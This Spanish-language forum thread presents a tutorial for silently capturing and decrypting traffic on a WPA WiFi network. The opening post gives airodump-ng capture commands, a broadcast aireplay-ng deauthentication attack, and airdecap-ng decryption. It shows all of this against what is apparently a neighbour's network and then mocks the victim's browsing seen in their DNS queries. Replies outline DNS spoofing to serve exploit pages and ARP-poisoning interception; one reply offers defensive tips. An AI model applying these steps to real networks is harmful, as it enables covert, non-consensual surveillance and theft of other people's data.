Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Capturando el tráfico de una red WiFi como un ninja

  • 9 Respuestas
  • 16394 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado rand0m

  • *
  • Underc0der
  • Mensajes: 214
  • Actividad:
    0%
  • Reputación 0
  • Paso de cosas personales, déjame
    • Ver Perfil
« en: Agosto 19, 2015, 03:22:11 am »
Capturando el tráfico de una red WiFi como un ninja


Una de las cosas que más nos debería preocupar cuando tenemos a un intruso en nuestra red de confianza (Red local de casa, del trabajo, etc.) es que capture el tráfico y lo analice, de forma que pueda controlar lo que estamos haciendo.

Una vez invadida una red WiFi podríamos intentar capturar tráfico con tcpdump, pero no tendríamos los resultados esperados. Una buena forma de hacerlo sería redirigir todo el tráfico de la red a nuestro equipo para poder analizarlo, pero ésto podría disparar varias alarmas.

The quieter you become, the more you are able to hear
El lema de BackTrack es lo que nos trae a buscar procedimientos más silenciosos, así que... ¿Cómo podemos capturar el tráfico de la red sin llamar la atención?

La respuesta es, como siempre: DEPENDE

Muchos hackers dan una respuesta muy tajante con respecto a la seguridad y el WiFi: No lo uses, usa cable. Pero ¿por qué son tan tajantes?

Algunos se amparan en la lógica de la velocidad de red. Está muy bien que con las redes WiFi N alcances 150Mbps, o que los 450Mbps con wifi a 5GHz, pero sigue siendo menos que la mitad que las redes Gigabit. Coherente, lógico y correcto. En eso es mejor el cable que el WiFi. ¿Pero qué más?

Seguridad. Utilizar WiFi es jugar con fuego bajo determinadas circunstancias, ya que el tráfico de la red se puede capturar sin estar conectado a la red (Cualquiera que sepa levantar claves WEP habrá capturado muchísimo tráfico antes de conocer la contraseña)

Una vez sabida la contraseña podríamos intentar descifrar todo el tráfico capturado para su posterior análisis en Ethereal. Pero en las redes WPA no es tan sencillo. Es muy fácil, pero no tanto.

¿Cómo se crackea una clave WPA?

No lo voy a explicar aquí en detalle, éso debéis estudiarlo en otros posts. Necesitamos llegar aquí sabiendo que necesitamos capturar el handshake de un cliente autenticado para hacerle un ataque por diccionario, hasta que el archivo se descifra correctamente y obtenemos el positivo.

Por esa regla de tres podemos deducir que si tenemos el handshake y la contraseña podemos descifrar los paquetes capturados para analizarlos después. Y para eso no necesitamos estar conectados a la red, sólo tener nuestra antena WiFi a la escucha.

El otro día estuve jugando con ataques de fuerza bruta contra WPS con un resultado fructífero. Usaré ese AP a modo de dummy. (Nota: Los posibles datos identificativos han sido editados)

Código: Text
  1. root@kali:/home/rand0m/neighbor# airodump-ng -w ahorateveo --bssid D8:61:FF:FF:FF:FF --essid VodafoneFFFF --channel  7 --output-format pcap -a wlan0mon

Lanzamos airodump-ng con los parámetros bssid y essid para filtrar sólo el tráfico de la red que nos interesa. Además le decimos que nos guarde el archivo ahorateveo en formato pcap.

Código: Text
  1.  CH  7 ][ Elapsed: 0 s ][ 2015-08-18 22:07
  2.  
  3.  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
  4.  
  5.  D8:61:FF:FF:FF:FF  -81 100       40        0    0   7  54e  WPA  CCMP   PSK  VodafoneFFFF
  6.  
  7.  BSSID              STATION            PWR   Rate    Lost    Frames  Probe

De primeras tenemos nuestra antena a la escucha y filtrando los paquetes de la red que queremos. Ahora necesitamos el handshake, así que lanzamos el ataque DEAUTH con aireplay-ng.

Código: Text
  1. root@kali:/home/rand0m/neighbor# aireplay-ng -0 0 -a D8:61:FF:FF:FF:FF wlan0mon
  2. 22:10:30  Waiting for beacon frame (BSSID: D8:61:FF:FF:FF:FF) on channel 7
  3. NB: this attack is more effective when targeting
  4. a connected wireless client (-c <client's mac>).
  5. 22:10:31  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  6. 22:10:32  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  7. 22:10:32  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  8. 22:10:33  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  9. 22:10:33  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  10. 22:10:34  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  11. 22:10:34  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  12. 22:10:34  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  13. 22:10:35  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  14. 22:10:35  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]

Hasta que conseguimos lo que queríamos: El WPA handshake.

Código: Text
  1.  CH  7 ][ Elapsed: 5 mins ][ 2015-08-18 22:12 ][ WPA handshake: D8:61:FF:FF:FF:FF
  2.  
  3.  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
  4.  
  5.  D8:61:FF:FF:FF:FF  -81 100       40        0    0   7  54e  WPA  CCMP   PSK  VodafoneFFFF
  6.  
  7.  BSSID              STATION            PWR   Rate    Lost    Frames  Probe
  8.  
  9.  D8:61:FF:FF:FF:FF  18:83:FF:FF:FF:FF  -74    1e- 6      0     4019  VodafoneFFFF

Ahora lo dejamos a la escucha y nos olvidamos. Vamos a dejarlo capturando unas horas y luego veremos qué nos encontramos.

Cuando tenemos un buen pino ya podemos ponernos a estudiar los datos recopilados.

Código: Text
  1.  CH  7 ] 9 hours 55 mins ][ 2015-08-19 08:02 ][ WPA handshake: D8:61:FF:FF:FF:FF
  2.  
  3.  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
  4.  
  5.  D8:61:FF:FF:FF:FF  -82  96   298434    99355    0   7  54e  WPA  CCMP   PSK  VodafoneFFFF
  6.  
  7.  BSSID              STATION            PWR   Rate    Lost    Frames  Probe
  8.  
  9.  D8:61:FF:FF:FF:FF  18:83:FF:FF:FF:FF  -75    1e- 6      0     1365  VodafoneFFFF

Ahora, para descifrarlo, usaremos la herramienta airdecap-ng, que viene con la suite de aircrack-ng.

Código: Text
  1. root@kali:/home/rand0m/neighbor# airdecap-ng -e VodafoneFFFF -b D8:61:FF:FF:FF:FF -p Underc0de ahorateveo-01.cap
  2. Total number of packets read       2532614
  3. Total number of WEP data packets         0
  4. Total number of WPA data packets     93405
  5. Number of plaintext data packets         0
  6. Number of decrypted WEP  packets         0
  7. Number of corrupted WEP  packets         0
  8. Number of decrypted WPA  packets     79414

Esto nos generará el archivo ahorateveo-01-dec.cap con los paquetes descifrados. Ya sólo nos queda abrirlo en Wireshark para poder analizar los datos recopilados.

Por ejemplo, viendo las consultas DNS realizadas podemos ver por dónde estuvo navegando.
Y podemos ver que es un chico malo malo que navega por piratebay y por páginas golfas. Lo típico que hace alguien relajándose mientras no hay nadie mirando, pero ¿cuántas veces creemos que no nos observan mientras sí lo hacen?

Además, como hablábamos al principio, los paquetes se capturaron del aire. No estoy conectado a la red, sólo conozco la contraseña.

NO aparezco conectado a su red. NO aparezco enviando tráfico sospechoso. Sólo escucho, descifro y analizo.

The quieter you become, the more you are able to hear

**
  by rand0m para Underc0de - Distribuido bajo licenicia CC-BY 4.0 (Click para ver los detalles).
« Última modificación: Septiembre 16, 2015, 08:52:32 am por ANTRAX »
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

Desconectado WhiZ

  • *
  • Underc0der
  • Mensajes: 395
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Agosto 19, 2015, 09:07:50 am »
Excelente aporte @rand0m! realmente da gusto leer tus posts! +1

Saludos!
WhiZ

P.D.: dejo todo como estaba.
« Última modificación: Agosto 19, 2015, 03:06:10 pm por WhiZ »


Desconectado Cl0udswX

  • *
  • Moderator
  • *
  • Mensajes: 875
  • Actividad:
    0%
  • Reputación 4
  • La fisica es el sistema operativo del universo.
    • Ver Perfil
    • cl0udswz - Sequre
  • Skype: cl0udzwx
  • Twitter: @cl0udswzsequre
« Respuesta #2 en: Agosto 19, 2015, 09:19:24 am »
Muy bueno @rand0m como siempre !!

Citar
Muchos hackers dan una respuesta muy tajante con respecto a la seguridad y el WiFi: No lo uses, usa cable. Pero ¿por qué son tan tajantes?

Algunos se amparan en la lógica de la velocidad de red. Está muy bien que con las redes WiFi N alcances 150Mbps, o que los 450Mbps con wifi a 5GHz, pero sigue siendo menos que la mitad que las redes Gigabit. Coherente, lógico y correcto. En eso es mejor el cable que el WiFi. ¿Pero qué más?

Pues en efecto tienes razon, las redes cableadas ofrecen mayores velocidades, pero son pocos flexibles, y la verdad no soportan mucha escalabilidad, ademas de las fallas inherentes a su forma fisica (cables dañados, diafonias por induccion, etc..) que son un poco mas seguras... Pues como tu dices, eso depende.  ::)

Ahora surge la pregunta: ¿Como evitar que rand0m alguien sepa los sitios que visito?

Pues si bien es cierto que la mayoria de los sitios web que visitamos cifran las comunicaciones de extremo a extremo (saber que tambien esto se vulnera con SSL_Trip) tambien es cierto que las consultas DNS van sin cifrar y en texto planito incluso cuando usamos HTTPS ó alguna VPN, la solucion... Instalar y configurar algun servicio de cifrado para las consultas DNS, mi recomendacion DNSCrypt existen mas alternativas por ahi, pero yo confio mas en la gente de OpenDNS.

Saludos por alla.
El talento se parece al tirador que da en un blanco que los demás no pueden alcanzar; el genio se parece al tirador que da en un blanco que los demás no pueden ver.


Desconectado rand0m

  • *
  • Underc0der
  • Mensajes: 214
  • Actividad:
    0%
  • Reputación 0
  • Paso de cosas personales, déjame
    • Ver Perfil
« Respuesta #3 en: Agosto 19, 2015, 01:20:53 pm »
Pues si bien es cierto que la mayoria de los sitios web que visitamos cifran las comunicaciones de extremo a extremo (saber que tambien esto se vulnera con SSL_Trip)
Supongo que te refieres al ataque sslstrip, que ya es un ataque MITM y no podríamos hacerlo capturando el tráfico con airodump-ng. Tendríamos que estar conectados a la red, por lo que ya no sería tan ninja.
Otra cosa que podría hacer, desplegando un ataque más complejo y que no trataremos aquí, sería reconfigurar el DHCP del router para que los clientes resuelvan sus consultas DNS en un servidor bajo mi control. También sería muy sigiloso, pero creo que el método menos ruidoso para capturar tráfico en una red es el expuesto en este post.
Aunque abramos el debate:

¿Es efectivamente el método de sniff más difícil de detectar?
¿Cuál sería el más sigiloso para capturar tráfico a través del cable?
« Última modificación: Agosto 19, 2015, 03:06:28 pm por WhiZ »
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

Desconectado Cl0udswX

  • *
  • Moderator
  • *
  • Mensajes: 875
  • Actividad:
    0%
  • Reputación 4
  • La fisica es el sistema operativo del universo.
    • Ver Perfil
    • cl0udswz - Sequre
  • Skype: cl0udzwx
  • Twitter: @cl0udswzsequre
« Respuesta #4 en: Agosto 19, 2015, 02:55:33 pm »
Citar
¿Es efectivamente el método de sniff más difícil de detectar?

Pues esnifar una red inalambrica siempre sera mas silencioso, pero jamas debemos pensar que sera totoalmente invisible, usando una que otra herramienta es posible detectar al espia, kismet por ejemplo puede generar alertas cuando algun NIC se comporte en modo ectraño, tambien existen herramientas de pago para detectar espias y/o tarjetas que esten esnifando. Pero en resumen creo que la respuesta seria: Si, esnifar una red inalambrica es mas dificil de detectar.

Citar
¿Cuál sería el más sigiloso para capturar tráfico a través del cable?

Pues en el caos de una red no conmutada esnifar no supone ningun problema, tampoco generariamos ruido al hacerlo, simplemente es sentarse a esperar las tramas que lleguen, pero ya cuando estamos conectamos a un entorno conmutado las cosas se ponen un poco  mas dificiles, es decir ó nos hacemos notar ó no esnifamos.

Para esnifar en una red conmutada necesitamos:

MAC Spoofing.
Desbordamiento de la tabla de direcciones MAC ó cualquier otra jugada.

El asunto es que esto genera ruidos y hace saltar las alarmas de cualquier red configurada decentemente. Una forma de hacerlo sin levantar sospechas es como comentas mas arriba, modificar la informacion que proporciona DHCP a los terminales y cambiar el servidor DNS (DNS Spoofing), pero no seria efectivo en terminales que tengan el direccionamiento estatico.

Saludos hermano.
El talento se parece al tirador que da en un blanco que los demás no pueden alcanzar; el genio se parece al tirador que da en un blanco que los demás no pueden ver.


Desconectado EPSILON

  • *
  • Underc0der
  • Mensajes: 363
  • Actividad:
    0%
  • Reputación 0
  • epsilon@crypt.am
    • Ver Perfil
  • Skype: epsilon.root1
« Respuesta #5 en: Agosto 19, 2015, 04:14:02 pm »
@rand0m , como dijo @WhiZ da gusto leer tus aportes!, sigue asi compañero.

Saludos!

Desconectado rand0m

  • *
  • Underc0der
  • Mensajes: 214
  • Actividad:
    0%
  • Reputación 0
  • Paso de cosas personales, déjame
    • Ver Perfil
« Respuesta #6 en: Agosto 19, 2015, 09:06:45 pm »
Como me refería a capturar el tráfico de un equipo conectado por cable desde mi antena wifi estamos ante una red conmutada, así que se nos plantea lo siguiente:
Para esnifar en una red conmutada necesitamos:

MAC Spoofing.
Desbordamiento de la tabla de direcciones MAC ó cualquier otra jugada.

El asunto es que esto genera ruidos y hace saltar las alarmas de cualquier red configurada decentemente. Una forma de hacerlo sin levantar sospechas es como comentas mas arriba, modificar la informacion que proporciona DHCP a los terminales y cambiar el servidor DNS (DNS Spoofing), pero no seria efectivo en terminales que tengan el direccionamiento estatico.
Así que podríamos intentar reconfigurar los servidores DNS utilizados para registrar cada consulta hecha en un servidor DNS desplegado por nosotros. Además eso nos permite controlar qué respuestas se dan a cada consulta, por lo que podríamos devolver a la inocente consulta de google.es la dirección de una página que tenemos preparada con algún (O varios) exploit. Pero no funcionaría en los equipos que tengan la configuración ajustada manualmente.
Para este tipo de casos ya tendríamos que sacar la artillería e intentarlo con un MITM por ARP Poisoning (Mi favorito), pero como comentábamos al principio no es tan ninja, pero cuando llega la hora de ponerse serios la mejor forma de plantear un ataque efectivo, como vimos en el de fuerza bruta contra WPS, es estudiar el entorno y buscar puntos débiles.

A base de capturar tráfico, analizarlo y estudiar el entorno podemos buscar indicios de algún servicio vulnerable, un mal hábito, o simplemente el login a una página que todavía no utilice SSL para ello (Sé que parece una tontería, pero la mayoría de los usuarios utilizan la misma contraseña para todo).

Y con todo esto la conclusión a la que llegamos es que bajo determinadas circunstancias (Este usuario utiliza todos sus equipos por wifi) el tráfico se puede interceptar y descifrar de una manera tan discreta como sintonizar nuestra antena al canal y capturando la información del aire. Eso es peligrosísimo, y para mitigarlo se implementan SSL y TSL, que para poder vulnerar tenemos que salir de las sombras (Conectarnos a la red) y empezar la acción. Pero eso creo que ya merece un post para él solo.
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

Desconectado Andreus

  • *
  • Underc0der
  • Mensajes: 11
  • Actividad:
    0%
  • Reputación 0
  • ¡Piensa siempre en voz alta!
    • Ver Perfil
  • Skype: AndreusCafe
« Respuesta #7 en: Septiembre 18, 2015, 11:00:24 pm »
Un aporte genial, llegué buscando exactamente ésto y lo encontré con el mayor de los lujos en detalles.

¡Gracias, RAND0M!
Si nos imponemos limites, no seremos más.

Desconectado tesla

  • *
  • Underc0der
  • Mensajes: 9
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #8 en: Agosto 26, 2016, 12:22:17 pm »
mi problema es que mi qireshark nada mas tiene wep key decryption.es buscado como poner wap or tras pero no e tenido suerte.

Desconectado ---

  • *
  • Underc0der
  • Mensajes: 66
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #9 en: Octubre 18, 2018, 12:06:51 pm »
No me desencripta ningún paquete  :-\

 

¿Te gustó el post? COMPARTILO!



Como crackear redes con wifislax metodo WPA/WPS

Iniciado por ecos-z

Respuestas: 3
Vistas: 10714
Último mensaje Septiembre 10, 2013, 11:13:05 am
por Devourer933
Cómo hacer más segura tu red inalámbrica

Iniciado por Nicolas12345

Respuestas: 5
Vistas: 3745
Último mensaje Febrero 15, 2016, 11:04:21 pm
por Cl0udswX
¿Cómo proteger tu red inalámbrica?

Iniciado por s747ik

Respuestas: 0
Vistas: 2252
Último mensaje Junio 12, 2011, 03:21:06 pm
por s747ik
Antena Parabolica Wifi casera Paso a Paso

Iniciado por GhosTrick

Respuestas: 9
Vistas: 18091
Último mensaje Diciembre 06, 2013, 09:29:18 pm
por xSyst3m
Virtual WiFi Router: convierte tu PC en un router inalámbrico

Iniciado por Stiuvert

Respuestas: 1
Vistas: 3450
Último mensaje Febrero 09, 2013, 01:38:38 pm
por mfuck